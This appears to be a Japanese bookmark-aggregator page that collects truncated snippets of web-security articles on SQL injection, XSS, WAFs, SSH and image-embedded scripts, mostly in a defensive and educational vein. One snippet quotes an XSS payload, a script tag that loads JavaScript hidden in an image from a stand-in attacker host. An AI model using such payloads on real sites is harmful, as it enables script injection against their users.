![SQLインジェクションでWebサイトをハッキングする方法(超意訳版) - おかねがない(゚∀゚)ッ!!](https://cdn-ak-scissors.b.st-hatena.com/image/square/db0c9f5672300f257ff187bfe793a0b862610b4f/height=288;version=1;width=512/https%3A%2F%2Fcdn-ak.f.st-hatena.com%2Fimages%2Ffotolife%2Fm%2Fmuggles0812%2F20120701%2F20120701183245.jpg)
こんにちは、opera 大好き 松岡 剛志 です。今日は部長職ではなくて、セキュリティチームリーダー立場でブログを書いています。 今回は弊社の様々なアプリケーションセキュリティの取り組みのうち、以下の4つのコンテンツについて書きます。この内容はほとんどが弊社のセキュリティイベントである Scrap Challenge で使われたスライドの焼き直しです。 トレーニング セキュリティレビュー コードレビュー セキュリティチェック トレーニング 現在ミクシィでは新卒エンジニアに対して1カ月程度の缶詰の教育を行っています。そのコンセプトは以下です。 関係各所、チーム、チーム横断でのタスクに関して 迷惑をかけずに自分で判断できる/あるいは正しく判断を仰げる状態までの成長。 現状の技術的問題点や課題を把握し、改善策や改善のためのプランニングができる。 各項目への知識体系の羅針盤を提供して、自学自習によ
初心者Webアプリケーション開発者がチェックすべき情報源を集めてみた。他に追加した方が良い情報源があった場合はご指摘いただけると助かります。 @ikepyonさんのご指摘により「LASDEC ウェブ健康診断」を追記した。 はてなブックマークの関連リンクによさそうな情報源があったので追記しました。それから、カテゴリを作りました。 ■Webサイト構築 安全なウェブサイトの作り方 http://www.ipa.go.jp/security/vuln/websecurity.html 安全なウェブサイトの作り方(全92ページ、2.09MB) セキュリティ実装 チェックリスト(Excel形式、33KB) 安全なSQLの呼び出し方(全40ページ、714KB) ■Webアプリケーション開発 セキュア・プログラミング講座 http://www.ipa.go.jp/security/awareness/ve
life is penetration. geeks cheer. geeks be ambitious.ちょっと調べてみるとよくまとまっているサイトを見かけたので拝借して、自分用にメモ。 こうして見ると結構あるものですね。まだまだ、世の中では「SQLインジェクションの注意喚起」という言葉をちょくちょく目にします。Web系の攻撃は、比較的手法が公開されている印象を受けますので、守る立場の方もお好みのものをセットアップして、調べながら手元で試してみてはいかがでしょうか。 守るだけではなく攻めることでまた、違った視点を持てることができ、守る力に磨きがかかるかもしれませんね。 ・Moth サイト: http://www.bonsai-sec.com/en/research/moth.php 環境: Linux VMWare image インストール: VM上で再生 ・Mutilli
sshにはダイナミック転送という機能がある。この機能を使うと、sshはアプリケーション側にはSOCKSプロクシとして振る舞うが、そこからsshの接続先までは暗号化された状態で通信が行われる。 これだけだと通常のトンネリングとどう違うのかよくわからないかもしれないが、ダイナミック転送の場合は転送ポートを指定する必要がない。ここがダイナミックと表現される所以だろう。 例えば、オフィスAにある開発サーバdev1にオフィス外からアクセスしたいとする。しかし、dev1はオフィス外には公開されておらず、踏み台サーバladd1を経由してしかアクセスするしかない。ladd1はsshのみが動いており、これまではsshのトンネリング機能を使ってアクセスしてきたのだが、ウェブアプリケーションをデバッグする際はいちいちウェブアプリケーションのポート毎にトンネルを掘るのが面倒くさい。オフィスに限らずデータセンターへ
http://www.cpni.gov.uk/Docs/Vulnerability_Advisory_SSH.txtやCPNI-957037: SSH 通信において一部データが漏えいする可能性, Plaintext Recovery Attack Against SSH - SSH - Company - News, CPNI-957037: SSH 通信において一部データが漏えいする可能性 - セキュリティホール memoによると, SSHプロトコルに設計のエラーがあり, OpenSSHの標準の設定だと, 2の-14〜-18乗の確率で14〜32bitの平文を回復できる可能性があるとのことです(当初32バイトと書きましたが間違いでした, また手法によって確率と回復できる平文のbit数に違いがありました). 攻撃の詳細はわかりませんが, 対策として暗号モードにCTRモードを利用することが挙げ
補足 この記事は旧徳丸浩の日記からの転載です(元URL、アーカイブ、はてなブックマーク1、はてなブックマーク2) 備忘のため転載いたしますが、この記事は2008年7月22日に公開されたもので、当時の徳丸の考えを示すものを、基本的に内容を変更せずにそのまま転載するものです。 なお、この記事を書いた後、WAFはこの記事の予言(願い?)通りに進展したように思います。そのあたりの歴史については、こちらのインタビュー記事を参照下さい。 補足終わり PCIデータセキュリティ基準(PCIDSS)がWAF(Web Application Firewall)について言及していることなどから、最近再びWAFへの関心が高まっている。一方、WAFは、一部のユーザや専門家に非常に評判が悪い。なぜ、そのようなことになるのか。本稿では、WAFの基本機能を説明した上で、その限界と運用上の問題を指摘し、今後のWAFの使い方
XSSとかSQLインジェクションとかをチェックするために、フォームの入力項目にスクリプトとかを入力するのが面倒だったので。 こんなん作りました。 Xss Check Helper http://yuroyoro.com/greasemonkey/xsscheckhelper.user.js 機能 ページ内のフォームコントロール(input[text,checkbox,radio],textfield,select)のvalueを指定した値に強制的に書き換えるスクリプトです。 たとえば、以下のようなcheckboxがあったとして、 <input type="checkbox" name="test_check" value="1"/>このスクリプトをかますと <input type="checkbox" name="test_check" value="<b>TestValue</b>"/>
ソフトウェアセキュリティエンジニアとトレーナー、両方の経験から言うと、物事を理解する早さは人によって大きく違うものだ。だが、本来優秀な人がなかなか実力を発揮しないことも多い。どんなバグでも突き止められるベテランのテスターが、セキュリティテストにはなかなか習熟できない、といったことがよくある。わたしはこの数年、世界最大級のソフトウェアベンダー数社で開発者チームのトレーニングに従事する中で、彼らの行動を調べ、優れたセキュリティテスターに必要なものを明らかにしようとしてきた。その結果分かったことを紹介しよう。 セキュリティテスターに必要な3つのスキル わたしは、セキュリティテスターは皆、以下の3つの専門スキルをベースとして持たなければならないという結論に達した。 優れた想像力 多くの場合、セキュリティテスターとして欲しい情報は、すべて手に入るわけではない。例えば、SQLインジェクションの脆弱性を
セキュリティの分野でもよく使われるフリー・ツールがある。その代表例が,ポート・スキャナの「Nmap」やぜい弱性検査ツールの「Nessus」だ。 セキュリティ・ベンダーであるフォティーンフォティ技術研究所 技術担当の金居良治取締役は,サーバーで開かれているポートを調べる際にNmapを利用する(図1)。Nmapは検査対象ホストの挙動からOSやサービスの種類,バージョンを判別する機能を備える。このため,ぜい弱性が発覚しているOSやアプリケーションを利用している場合はすぐに分かる。「設定ミスで不要なサービスが起動したままになっていることがしばしばある。設定に自信があってもスキャンすべき」(金居取締役)という。 図1●ポート・スキャナ「Nmap」の利用例 サーバーの設定に間違いはないか,社内ネットに不正なパソコンが接続されていないかなどを調べる用途に使える。[画像のクリックで拡大表示] また不正アク
UTF-7を利用したXSSは、charset が指定されていない場合に発生すると考えられていますが、少なくとも Internet Explorer においては、これは大きな間違いです。正しくは、Internet Explorer が認識できる charset が指定されていない場合であり、charsetが付加されていても、IEが認識できない文字エンコーディング名である場合にはXSSが発生します。 例えば、次のような HTML は(HTTPレスポンスヘッダで charset が明示されていない場合)IEが文字エンコーディング名を正しく認識できないため、その内容からUTF-7と解釈されるためにスクリプトが動作します。"utf8"という表記はUTF-8の慣用的な表現ではありますが、ハイフンが抜けており正しい表記ではありません。 <html> <head> <meta http-equiv="Co
だいぶ時間がたってしまいましたが、大垣さんの以下のブログにコメントしたことなどをまとめます。 画像ファイルにPHPコードを埋め込む攻撃は既知の問題 – yohgaki's blog アップロード画像を利用した攻撃についてです。 攻撃の概要 画像ファイルにPHPコマンドを挿入する攻撃は、大きく2種類に分けることができます。 1つは、画像のアップロード機能を持つサイト自身を狙う攻撃です。PHPで開発されており、任意の拡張子のファイルのアップロードを許すサイトでは、拡張子がphpなどのファイルをアップロードされる恐れがあります。 拡張子がphpなどのファイルに仕込まれたPHPコマンドは、そのファイルにHTTP/HTTPSでアクセスされた際に実行されます。攻撃者は、アップロードファイルを通じて、画像が置かれるWebサーバ上で任意のコマンドを実行することできます。 この脆弱性は、アップロード可能なフ
1章 ウェブアプリケーションセキュリティの基礎 ・HTMLによる制限は回避可能である ・裏側で何が行われているのか ・パケットスニッファ ・プロキシツール ・ウェブブラウザの存在そのものが偽装できる ・リクエストの書き換えでHTMLの制限を回避する ・JavaScriptの制限を回避する ・hiddenフィールドの内容を書き換える ・フォームの値の書き換えとGET/POST ・Cookieを書き換える ・リファラやUser-Agentを書き換える ・リクエストに含まれる情報は信用できない 2章 データ処理の原則と指針 ・データ処理の原則 - 原則1 - 原則2 - 原則3 - 原則4 ・hiddenフィールドとCookieに関する指針 - 指針1 - 指針2 - セキュリティと前提 ・「入力時に型チ
先日、さくらインターネットで専用サーバーをレンタルしました。で、サービスのセットアップや動作確認など準備を進めている最中なのですが… サーバーをレンタルしてから数日後、ふとログファイルをチェックしていたところ、/var/log/maillogに見覚えのないログがつらつらと… …思いっきりSPAMの踏み台にされていましたorz もしや!! と思い、iptablesで解放portを調べてみたところ… # /sbin/iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt sou
ここで述べるのは、脆弱性が生まれにくいWebアプリケーションを構築するために設計段階、あるいはそれ以前の段階で考慮しておくとよい事項の例である。 (1) 開発環境の選択 1) プログラマが脆弱性をつくり易い環境を避ける 今日のWEBアプリケーション開発環境は、プログラミング言語の処理系に加えて、開発フレームワークやコンテンツ管理システム(CMS)、さらに外部のテンプレート言語までを加えた総合的な環境となってきている。 短時日で素早くサイトを立ち上げることを目的として、「軽量言語」と呼ばれる各種スクリプト言語が標準で備えているWEBアプリケーションを手軽に開発するための機能やライブラリをそのまま利用することは悪くない。しかし、その手軽さ故に、セキュリティの観点からは多くの脆弱性を生んできた経緯がある。 例えば、下記の事例が挙げられる。 PHPの4.1以前のバージョンの環境は、「registe
(Last Updated On: 2014年12月5日)前回のエントリでイメージファイルにスクリプトを埋め込んで攻撃する方法について記載しましたが、最近イメージファイルにスクリプトを埋め込む事例が話題になったためか ha.ckersにJavaScriptをイメージファイルに隠す方法が紹介されています。 http://ha.ckers.org/blog/20070623/hiding-js-in-valid-images/ <script src="http://cracked.example.com/cracked.gif"> などとXSS攻撃を拡張する手段に利用可能です。サンプルとしてFlickerにJavaScriptを埋め込んだイメージファイルがアップされています。 このイメージファイルは上手く細工しているので画像としても表示され、JavaScriptも実行できます。 Flicke
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く